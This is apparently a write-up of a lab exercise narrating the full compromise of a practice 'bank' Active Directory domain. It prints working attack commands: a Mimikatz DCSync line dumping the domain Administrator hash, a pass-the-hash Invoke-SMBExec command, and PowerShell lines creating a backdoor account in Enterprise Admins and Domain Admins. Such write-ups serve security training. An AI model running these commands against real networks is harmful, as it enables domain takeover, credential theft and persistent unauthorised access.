Full Compromise of BANK Domain
Last updated
Was this helpful?
Last updated
Was this helpful?
Powershell
Mimikatz
PsExec
Invoke-SMBExec.ps1
Remmina
Windows Remote Desktop
Within the context of the administrator created by our golden ticket, we are able to retrieve the hash of the local administrator. With this, we are using SMBExec to place our own user equipped with all the rights necessary to do anything on the rootdc. Thence force we are able to connect to the bankdc, create our own user in the bank domain and place with these users the proof of compromises on all the machines available.
From the child domain, we are not able to reach the bankdc directory.
As already mentioned in the previous section, we’ll use the running webservers on attack machine and the VPN to get the tools PSExec and SMBExec.
Starting a second Powershell as Administrator to run PSExec to validate Commands dropped via SMBExec
Running PSExec in the context of the Administrator we impersonate through the golden ticket we are able to connect to the rootdc and run a command line.
With the connection established, we try to add our rootdc user but are not able to do so.
New-ADUser 0xb0b_rootdc
Add-ADGroupMember -Identity 'Enterprise Admins' -Members 0xb0b_rootdc
Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b_rootdc
Set-ADAccountPassword -Identity 0xb0b_rootdc-NewPassword (ConvertTo-SecureString -AsPlainText 'WhoKnows1337Me!' -Force)
Enable-ADAccount -Identity '0xb0b_rootdc'
The next idea is to retrieve the Administrator hash we originally wanted to get in the full Compromise Parent Domain section. Now within the context of the golden ticket, we are able to retrieve the hash with already retrieved the SID in the last section.
lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500
Without golden ticket administrator impersonation:
With golden ticket administrator impersonation:
And we have the Administrator hash: 58a478135a93ac3bf058a5ea0e8fdb71
With this hash, we are able to pass the hash in running SMB-Exec to drop our commands there to add a user to the rootdc. We won’t get any feedback, but we still have PSExec running which comes in handy, because now we can check if our input is successful.
Running Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "mkdir C:\Test" -verbose to create a directory on C:\ drive of the rootdc.
And we check if it is there in the PsExec session:
Now we add a User to ROOTDC allows us to access BANKDC with that user equipping the user with the full portfolio of rights via adding the user to the Domain Admins and Enterprise Admins groups.
Everything runs through to create the rootdc user.
And we have a user on rootdc.
Checking out the correct domains via Active Directory Domains and Trusts on the child domain corpdc.
And from the corpdc we are able to connect to the rootdc via Windows Remote Desktop and our newly created rootdc user.
And from the corpdc we are able to connect to the bankdc via Windows Remote Desktop and our newly created rootdc user.
From there we are still not able to place our proof of compromises on all the machines in the bank domain, because our rootdc user doesnt exist here. So we created another user 0xb0b on the bankdc.
Next, we try to place our proof of compromises on all machines with the use of runas so we don’t have to use RDP for every single machine.
To not have all the time entering a password by running runas we just open a cmd as bank/0xb0b where /k doesn’t close the terminal and run our commands from there to place our proofs.
